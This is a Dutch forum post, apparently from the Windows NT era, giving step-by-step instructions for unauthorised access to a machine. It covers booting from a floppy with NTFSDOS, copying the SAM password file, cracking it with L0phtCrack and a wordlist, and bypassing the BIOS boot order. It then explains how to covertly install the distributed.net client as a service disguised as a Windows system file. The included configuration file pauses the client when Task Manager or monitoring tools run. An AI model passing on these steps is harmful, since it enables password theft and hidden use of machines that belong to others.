Als je als gewone gebruiker bent ingelogd kun je dat bestandje helemaal niet lezen! Het beste is om die bak te resetten, bootfloppie der in met ntfsdos erop (kun je halen bij
www.sysinternals.com ). Als je ntfsdos start mount ie je ntfs partities onder een nieuwe drive letter. kopieer nu het bestand ?:\winnt\system32\config\sam naar je floppie. In winnt\repair staat er inderdaad ook een maar die is meestal oud. Haal dan effe L0phtcrack bij
www.l0phtcrack.com en download meteen een grote nederlandse wordlist. Verder moet het makkelijk te doen zijn. Vaak heb je met een goede wordlist al de meeste wachtwoorden (ook die van administrator!) en anders begin je gewoon met een kleine character set voeg met verstand tekens toe.
Als je niet van diskette kunt opstarten heb je een klein probleempje. Waarschijnlijk kun je wel achter het wachtwoord komen met bios (
www.geocities.com/mbockelkamp). Ik weet effe niet zeker of dat ook onder NT zelf werkt (denk het haast wel). Dan gewoon bij het opstarten in de bios proberen te komen (del, F1, F10 ofzoiets) en dan de boot sequence veranderen naar A,C. Nu kun je gewoon van diskette booten. Verander dit daarna wel weer netjes terug! Ga ook NIET het bios wachtwoord veranderen, dat is stom.
Als je als administrator bent ingelogd moet je ook GEEN stupid dingen gaan doen, alleen wat hoognodig is (ons koetje even installen). Kies een leuke naam voor je dnetc.exe en .ini. Iets zoals msresc32.exe ofzo ziet er weel cool uit. zet de bestandjes gewoon in winnt\system32. doe nu even msresc32.exe -install. Verander ook nog even in het register de displayname van de service. Kun je vinden onder [HLM\SYSTEM\CurrentControlSet\Services\dnetc]. Je kunt natuurlijk ook een batch bestandje maken dat alles voor je doet (kopieeren, reg-filetje importeren). Zorg ook voor goede instellingen in je ini file, en zorg dat je de nieuwste versie van de koe hebt.
Hier een voorbeeldje van een ini filetje van mij:
[parameters]
id=emailadres
[buffers]
buffer-file-basename=MSRESIB
output-file-basename=MSRESOB
checkpoint-filename=MSRESDX.DAT
[misc]
project-priority=RC5,DES=0,CSC=0,OGR=0
[triggers]
pause-watch-plist=taskmgr|wintop|sysmon|defrag|scandskw
pause-on-no-mains-power=yes
exit-flag-filename=
[rc5]
fetch-time-threshold=6
[networking]
keyserver=*:80
dialup-watcher=passive
[display]
detached=yes
Succes ermee!
P.S. Ik merk wel dat hier regelmatig vragen over zijn, zouden we niet een soort koeien FAQ kunnen samenstellen met wat nuttige info d'r in? Ik weet bv. ook nog een hele hoop over koeien op win9x bakken en automatische installatie scripts.